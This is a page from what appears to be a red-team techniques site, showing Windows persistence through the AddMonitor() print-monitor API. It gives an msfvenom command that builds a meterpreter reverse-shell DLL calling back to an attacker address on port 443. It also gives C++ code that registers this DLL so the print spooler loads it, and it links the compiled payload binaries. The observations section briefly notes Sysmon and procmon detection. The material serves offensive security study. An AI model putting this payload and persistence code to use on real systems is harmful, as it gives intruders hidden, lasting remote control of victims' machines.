Red Teaming Experiments
linkedingithub@spotheplanetpatreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
Schtask
Service Execution
Sticky Keys
Create Account
AddMonitor()
NetSh Helper DLL
Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
Screensaver Hijack
Application Shimming
BITS Jobs
COM Hijacking
SIP & Trust Provider Hijacking
Hijacking Time Providers
Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By GitBook
AddMonitor()
Persistence, Privilege Escalation

Execution

Generating a 64-bit meterpreter payload to be injected into the spoolsv.exe:
[email protected]
1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=443 -f dll > evil64.dll
Copied!
Writing and compiling a simple C++ code that will register the monitor port:
monitor.cpp
1
#include "stdafx.h"
2
#include "Windows.h"
3
​
4
int main() {
5
MONITOR_INFO_2 monitorInfo;
6
TCHAR env[12] = TEXT("Windows x64");
7
TCHAR name[12] = TEXT("evilMonitor");
8
TCHAR dll[12] = TEXT("evil64.dll");
9
monitorInfo.pName = name;
10
monitorInfo.pEnvironment = env;
11
monitorInfo.pDLLName = dll;
12
AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
13
return 0;
14
}
Copied!
T1013-PortMonitor64.exe
59KB
Binary
PortMonitor64
evil64.dll
5KB
Binary
evil64.dll - meterpreter payload
Move evil64.dll to %systemroot% and execute the compiled monitor.cpp.

Observations

Upon launching the compiled executable and inspecting the victim machine with procmon, we can see that the evil64.dll is being accessed by the spoolsvc:
which eventually spawns a rundll32 with meterpreter payload, that initiates a connection back to the attacker:
The below confirms the procmon results explained above:
Sysmon commandline arguments and network connection logging to the rescue:

References

Boot or Logon Autostart Execution: Port Monitors, Sub-technique T1547.010 - Enterprise | MITRE ATT&CK®
https://msdn.microsoft.com/en-us/library/windows/desktop/dd183341(v=vs.85).aspx
msdn.microsoft.com
https://msdn.microsoft.com/en-us/library/windows/desktop/dd145068(v=vs.85).aspx
msdn.microsoft.com
​
Previous
Create Account
Next
NetSh Helper DLL
Last modified 2yr ago
Copy link
Contents
Execution
Observations
References